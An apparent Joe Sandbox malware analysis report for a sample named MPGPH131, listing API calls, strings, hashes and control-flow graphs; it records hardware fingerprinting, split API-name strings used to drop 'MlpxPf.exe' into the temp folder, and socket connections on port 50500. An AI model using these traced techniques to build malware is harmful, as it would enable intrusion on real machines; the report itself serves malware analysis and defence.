                                    • Instruction Fuzzy Hash: 28E1D171A002099FDB28DF6CC894A6DBBA1FF89310F148369E819DB795E730ED51CB90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0083844D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: parse error$ror
                                    • API String ID: 2659868963-4201802366
                                    • Opcode ID: 8865f9ca2000c68dc474f62161b402a8e263f8027221041d7aa81b5cbe19419e
                                    • Instruction ID: d3418e3e5ea75af765122dc639ca0fe3fa29b5bdb2028161d1030390b89fc7e3
                                    • Opcode Fuzzy Hash: 8865f9ca2000c68dc474f62161b402a8e263f8027221041d7aa81b5cbe19419e
                                    • Instruction Fuzzy Hash: 82C1E171910749DFDB08CF68CC85BADBB72FF95304F148248E404AB692DB74AA84CB91
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00838051
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00838060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: [json.exception.
                                    • API String ID: 4194217158-791563284
                                    • Opcode ID: 11895a3bf62bd962d17445be7e7a22b3d6937293ef071da762782ce7f1710bff
                                    • Instruction ID: 1831bca9e01808b1a37b215b0365e21a095703352ce90d98bf2e7177d9c66ae6
                                    • Opcode Fuzzy Hash: 11895a3bf62bd962d17445be7e7a22b3d6937293ef071da762782ce7f1710bff
                                    • Instruction Fuzzy Hash: B89107719002089FDB18DF68CC95B9EBBB1FF85314F14425DF410AB692DBB4EA84C791
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00833C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1240500531
                                    • Opcode ID: ee13bcdeeac3d293a727f89d084407975a48309561f834178367d3d510bed3e3
                                    • Instruction ID: bf65cef557152a844086f357d429c37ed0becb8e2df247227c6f83ebe9463675
                                    • Opcode Fuzzy Hash: ee13bcdeeac3d293a727f89d084407975a48309561f834178367d3d510bed3e3
                                    • Instruction Fuzzy Hash: B141E2B1900608ABC714DF59C845BAAF7F8FF85720F14861AF954E7681E774AA408BE1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A4E29
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A4E42
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A594D
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 008A5966
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: ffedefc0a964181ccb1d98b4377fcdf068f25662779c19c377b641d801048940
                                    • Instruction ID: fea0bcf48620ad224774cd9c87744dc637ea19baed147d106c0b7e148078be55
                                    • Opcode Fuzzy Hash: ffedefc0a964181ccb1d98b4377fcdf068f25662779c19c377b641d801048940
                                    • Instruction Fuzzy Hash: EE51E2B0C00648DFEF14DFA4DC85BDEBBB4FF46304F184259E455AB682D7746A888B52
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 008A99F1
                                    Strings
                                    • type must be string, but is , xrefs: 008A9A58
                                    • type must be boolean, but is , xrefs: 008A9AE2
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID: type must be boolean, but is $type must be string, but is
                                    • API String ID: 118556049-436076039
                                    • Opcode ID: 85336d12a36526499f48fb2b31c4dc688bfb4f36d62f0316d3282c46069c449c
                                    • Instruction ID: ebc93930da12e310e6cf2037c2ed1998ad3f802404b526dc2d2ad3eeb81ad4e8
                                    • Opcode Fuzzy Hash: 85336d12a36526499f48fb2b31c4dc688bfb4f36d62f0316d3282c46069c449c
                                    • Instruction Fuzzy Hash: FA316CB5904248EFDB14EBA8D842B9EB7A8FB44710F144669F415D7AC2EB34AA04C792

                                    Execution Graph

                                    Execution Coverage:1.4%
                                    Dynamic/Decrypted Code Coverage:1.9%
                                    Signature Coverage:0%
                                    Total number of Nodes:207
                                    Total number of Limit Nodes:33
                                    execution_graph 23744 838b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23745 84a100 7 API calls 3 library calls 23725 910880 RtlAllocateHeap ___except_validate_context_record __freea _ValidateLocalCookies __IsNonwritableInCurrentImage 23726 844a90 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 23634 898610 23635 898657 23634->23635 23637 898628 std::locale::_Setgloballocale 23634->23637 23639 89ba20 23635->23639 23638 89866a 23640 89bb6c 23639->23640 23641 89ba45 23639->23641 23662 832040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23640->23662 23642 89ba5a 23641->23642 23645 89baa6 23641->23645 23647 89bab3 23641->23647 23654 90cd02 23642->23654 23644 89bb71 23663 831fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23644->23663 23645->23642 23645->23644 23650 90cd02 std::_Facet_Register 2 API calls 23647->23650 23652 89ba6a std::locale::_Init std::locale::_Setgloballocale 23647->23652 23650->23652 23653 89bb2a std::locale::_Init std::locale::_Setgloballocale 23652->23653 23664 912220 RtlAllocateHeap ___std_exception_copy __Getctype 23652->23664 23653->23638 23657 90cd07 std::_Facet_Register 23654->23657 23656 90cd21 23656->23652 23657->23656 23659 831fa0 Concurrency::cancel_current_task 23657->23659 23665 91b99c 23657->23665 23658 90cd2d 23658->23658 23659->23658 23671 90e0c1 RtlAllocateHeap RtlAllocateHeap __freea ___std_exception_copy 23659->23671 23661 831fe3 23661->23652 23662->23644 23663->23652 23670 92489d __Getctype std::_Facet_Register 23665->23670 23666 9248db 23672 91acaf RtlAllocateHeap __dosmaperr 23666->23672 23667 9248c6 RtlAllocateHeap 23669 9248d9 23667->23669 23667->23670 23669->23657 23670->23666 23670->23667 23671->23661 23672->23669 23674 54c0c52 23675 54c0c66 GetCurrentHwProfileW 23674->23675 23676 54c0c82 23675->23676 23727 844ab0 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23695 916ba6 23696 916bb9 ___std_exception_copy 23695->23696 23701 9168fd 23696->23701 23698 916bce 23708 911f4c RtlAllocateHeap ___std_exception_copy 23698->23708 23700 916bdb 23703 916909 std::locale::_Setgloballocale 23701->23703 23702 91690f 23718 912193 RtlAllocateHeap ___std_exception_copy __Getctype 23702->23718 23703->23702 23706 916952 23703->23706 23705 91692a 23705->23698 23709 916a80 23706->23709 23708->23700 23710 916a93 23709->23710 23711 916aa6 23709->23711 23710->23705 23719 9169a7 23711->23719 23713 916b57 23713->23705 23714 916ac9 23714->23713 23715 913041 4 API calls 23714->23715 23716 916af7 23715->23716 23717 91bbed 2 API calls 23716->23717 23717->23713 23718->23705 23720 9169b8 23719->23720 23721 916a10 23719->23721 23720->23721 23723 91bbad SetFilePointerEx RtlAllocateHeap ___std_exception_copy 23720->23723 23721->23714 23723->23721 23450 912dd0 23453 912d0e 23450->23453 23452 912de2 23456 912d1a std::locale::_Setgloballocale 23453->23456 23454 912d21 23471 91acaf RtlAllocateHeap __dosmaperr 23454->23471 23456->23454 23457 912d41 23456->23457 23459 912d53 23457->23459 23460 912d46 23457->23460 23458 912d26 23472 912210 RtlAllocateHeap ___std_exception_copy 23458->23472 23467 9240f8 23459->23467 23473 91acaf RtlAllocateHeap __dosmaperr 23460->23473 23464 912d5c 23466 912d31 23464->23466 23474 91acaf RtlAllocateHeap __dosmaperr 23464->23474 23466->23452 23468 924104 std::_Lockit::_Lockit std::locale::_Setgloballocale 23467->23468 23475 92419c 23468->23475 23470 92411f 23470->23464 23471->23458 23472->23466 23473->23466 23474->23466 23480 9241bf 23475->23480 23477 924220 23485 924823 RtlAllocateHeap __dosmaperr 23477->23485 23479 924205 23479->23470 23480->23479 23481 923e63 23480->23481 23484 923e70 __Getctype std::_Facet_Register 23481->23484 23482 923e9b RtlAllocateHeap 23483 923eae __dosmaperr 23482->23483 23482->23484 23483->23477 23484->23482 23484->23483 23485->23479 23750 832540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::locale::_Init 23487 916658 23488 91666b ___std_exception_copy 23487->23488 23493 916533 23488->23493 23490 916677 23500 911f4c RtlAllocateHeap ___std_exception_copy 23490->23500 23492 916683 23494 91653f std::locale::_Setgloballocale 23493->23494 23495 916549 23494->23495 23498 91656c 23494->23498 23515 912193 RtlAllocateHeap ___std_exception_copy __Getctype 23495->23515 23497 916564 23497->23490 23498->23497 23501 9165ca 23498->23501 23500->23492 23502 9165d7 23501->23502 23503 9165fa 23501->23503 23540 912193 RtlAllocateHeap ___std_exception_copy __Getctype 23502->23540 23514 9165f2 23503->23514 23516 913041 23503->23516 23510 916626 23533 9224af 23510->23533 23514->23497 23515->23497 23517 91305a 23516->23517 23521 913081 23516->23521 23518 9239f2 RtlAllocateHeap 23517->23518 23517->23521 23519 913076 23518->23519 23542 922dfb 23519->23542 23522 92485d 23521->23522 23523 924874 23522->23523 23524 91661a 23522->23524 23523->23524 23610 924823 RtlAllocateHeap __dosmaperr 23523->23610 23526 9239f2 23524->23526 23527 923a13 23526->23527 23528 9239fe 23526->23528 23527->23510 23611 91acaf RtlAllocateHeap __dosmaperr 23528->23611 23530 923a03 23612 912210 RtlAllocateHeap ___std_exception_copy 23530->23612 23532 923a0e 23532->23510 23534 9224d8 23533->23534 23535 91662d 23533->23535 23536 922527 23534->23536 23538 9224ff 23534->23538 23535->23514 23541 924823 RtlAllocateHeap __dosmaperr 23535->23541 23617 912193 RtlAllocateHeap ___std_exception_copy __Getctype 23536->23617 23613 92241e 23538->23613 23540->23514 23541->23514 23543 922e07 std::locale::_Setgloballocale 23542->23543 23544 922e48 23543->23544 23546 922e8e 23543->23546 23548 922e0f 23543->23548 23563 912193 RtlAllocateHeap ___std_exception_copy __Getctype 23544->23563 23546->23548 23549 922f0c 23546->23549 23548->23521 23552 922f34 23549->23552 23562 922f57 23549->23562 23550 922f38 23569 912193 RtlAllocateHeap ___std_exception_copy __Getctype 23550->23569 23552->23550 23553 922f93 23552->23553 23554 922fb1 23553->23554 23570 91bbed 23553->23570 23564 922a51 23554->23564 23558 923010 23560 923079 WriteFile 23558->23560 23558->23562 23559 922fc9 23559->23562 23573 922622 RtlAllocateHeap RtlAllocateHeap std::locale::_Init std::_Locinfo::_Locinfo_ctor _ValidateLocalCookies 23559->23573 23560->23562 23562->23548 23563->23548 23574 92e7b4 23564->23574 23566 922a63 23568 922a91 23566->23568 23583 917780 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor ___std_exception_copy 23566->23583 23568->23558 23568->23559 23569->23562 23587 91bacc 23570->23587 23572 91bc06 23572->23554 23573->23562 23575 92e7c1 23574->23575 23576 92e7ce 23574->23576 23584 91acaf RtlAllocateHeap __dosmaperr 23575->23584 23578 92e7da 23576->23578 23585 91acaf RtlAllocateHeap __dosmaperr 23576->23585 23578->23566 23580 92e7c6 23580->23566 23581 92e7fb 23586 912210 RtlAllocateHeap ___std_exception_copy 23581->23586 23583->23568 23584->23580 23585->23581 23586->23580 23592 92814e 23587->23592 23589 91bade 23590 91bafa SetFilePointerEx 23589->23590 23591 91bae6 23589->23591 23590->23591 23591->23572 23593 928170 23592->23593 23594 92815b 23592->23594 23598 928195 23593->23598 23607 91ac9c RtlAllocateHeap __dosmaperr 23593->23607 23605 91ac9c RtlAllocateHeap __dosmaperr 23594->23605 23597 928160 23606 91acaf RtlAllocateHeap __dosmaperr 23597->23606 23598->23589 23599 9281a0 23608 91acaf RtlAllocateHeap __dosmaperr 23599->23608 23602 928168 23602->23589 23603 9281a8 23609 912210 RtlAllocateHeap ___std_exception_copy 23603->23609 23605->23597 23606->23602 23607->23599 23608->23603 23609->23602 23610->23524 23611->23530 23612->23532 23614 92242a std::locale::_Setgloballocale 23613->23614 23616 922469 23614->23616 23618 922582 23614->23618 23616->23535 23617->23535 23619 92814e RtlAllocateHeap 23618->23619 23620 922592 23619->23620 23623 92814e RtlAllocateHeap 23620->23623 23626 922598 23620->23626 23629 9225ca 23620->23629 23622 92814e RtlAllocateHeap 23624 9225d6 FindCloseChangeNotification 23622->23624 23625 9225c1 23623->23625 23624->23626 23627 92814e RtlAllocateHeap 23625->23627 23630 9280bd RtlAllocateHeap __dosmaperr 23626->23630 23627->23629 23628 9225f0 23628->23616 23629->23622 23629->23626 23630->23628 23742 91abd8 SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23633 54c0b15 GetCurrentHwProfileW 23677 e07000 23679 e07044 GetPEB 23677->23679 23683 e07077 GetTempPathA 23679->23683 23681 e0720b CreateFileA 23682 e0722d 23681->23682 23683->23681 23684 84db60 WSAStartup 23685 84db98 23684->23685 23689 84dc56 23684->23689 23686 84dc24 socket 23685->23686 23685->23689 23687 84dc3a connect 23686->23687 23686->23689 23688 84dc4c closesocket 23687->23688 23687->23689 23688->23686 23688->23689 23734 84e460 6 API calls

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 e07044-e07074 GetPEB 1 e07077-e0709a 0->1 2 e0709d-e070a0 1->2 3 e070a6-e070bc 2->3 4 e071ee-e0722b GetTempPathA CreateFileA 2->4 5 e07110-e07116 3->5 6 e070be-e070c5 3->6 11 e07265-e07269 4->11 12 e0722d-e07230 4->12 8 e07118-e0711f 5->8 9 e07129-e0712f 5->9 6->5 10 e070c7-e070ce 6->10 8->9 13 e07121-e07124 8->13 14 e07131-e07138 9->14 15 e07148-e0714e 9->15 10->5 16 e070d0-e070d7 10->16 17 e07232-e07238 12->17 18 e071bb-e071c0 13->18 14->15 19 e0713a-e07141 14->19 20 e07150-e07157 15->20 21 e07167-e0716f 15->21 16->5 22 e070d9-e070dd 16->22 23 e07246-e07251 17->23 24 e0723a-e07242 17->24 26 e071e0-e071e9 18->26 27 e071c2-e071c5 18->27 19->15 25 e07143-e07146 19->25 20->21 28 e07159-e07160 20->28 29 e07171-e07178 21->29 30 e07188-e0718e 21->30 22->5 31 e070df-e070e3 22->31 42 e07255-e07261 23->42 24->17 36 e07244 24->36 25->18 26->2 27->26 37 e071c7-e071ca 27->37 28->21 38 e07162-e07165 28->38 29->30 32 e0717a-e07181 29->32 34 e07190-e07197 30->34 35 e071a7-e071ad 30->35 31->18 33 e070e9-e0710b 31->33 32->30 39 e07183-e07186 32->39 33->1 34->35 40 e07199-e071a0 34->40 35->18 41 e071af-e071b6 35->41 36->42 37->26 43 e071cc-e071cf 37->43 38->18 39->18 40->35 45 e071a2-e071a5 40->45 41->18 46 e071b8 41->46 42->11 43->26 47 e071d1-e071d4 43->47 45->18 46->18 47->26 49 e071d6-e071d9 47->49 49->26 50 e071db-e071de 49->50 50->4 50->26
                                    APIs
                                    • GetTempPathA.KERNELBASE(00000104,?), ref: 00E071FA
                                    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00E07223
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFilePathTemp
                                    • String ID: .dll$Clos$Crea$GetM$GetT$Kern$MlpxPf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                    • API String ID: 1031868398-650681566
                                    • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction ID: 42c59f00e1eedd9f801db889e395201809067f4dbc25380a7ce7abbf80ff645a
                                    • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                    • Instruction Fuzzy Hash: 63610D74D0A215DBCF24CF94C844AADB7B0BF48319F25A5AAD5857B2C1C370AEC1CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 51 84db60-84db92 WSAStartup 52 84dc66-84dc6f 51->52 53 84db98-84dbc2 call 837d20 * 2 51->53 58 84dbc4-84dbc8 53->58 59 84dbce-84dc14 53->59 58->52 58->59 61 84dc16-84dc1c 59->61 62 84dc60 59->62 63 84dc74-84dc7e 61->63 64 84dc1e 61->64 62->52 63->62 70 84dc80-84dc88 63->70 65 84dc24-84dc38 socket 64->65 65->62 66 84dc3a-84dc4a connect 65->66 68 84dc70 66->68 69 84dc4c-84dc54 closesocket 66->69 68->63 69->65 71 84dc56-84dc5a 69->71 71->62
                                    APIs
                                    • WSAStartup.WS2_32 ref: 0084DB8B
                                    • socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0084DC2E
                                    • connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0084DC42
                                    • closesocket.WS2_32(00000000), ref: 0084DC4D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true
                                    • Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startupclosesocketconnectsocket
                                    • String ID: 50500$`4u
                                    • API String ID: 3098855095-1883443620
                                    • Opcode ID: 2dd402dd94c68f3afb362514ba8549ffd176e0b1d253c8c63ddf144f3637cb14
                                    • Instruction ID: 18081c6f53999451cd6635194afa742b9527dee88daed567605308f670ef726a
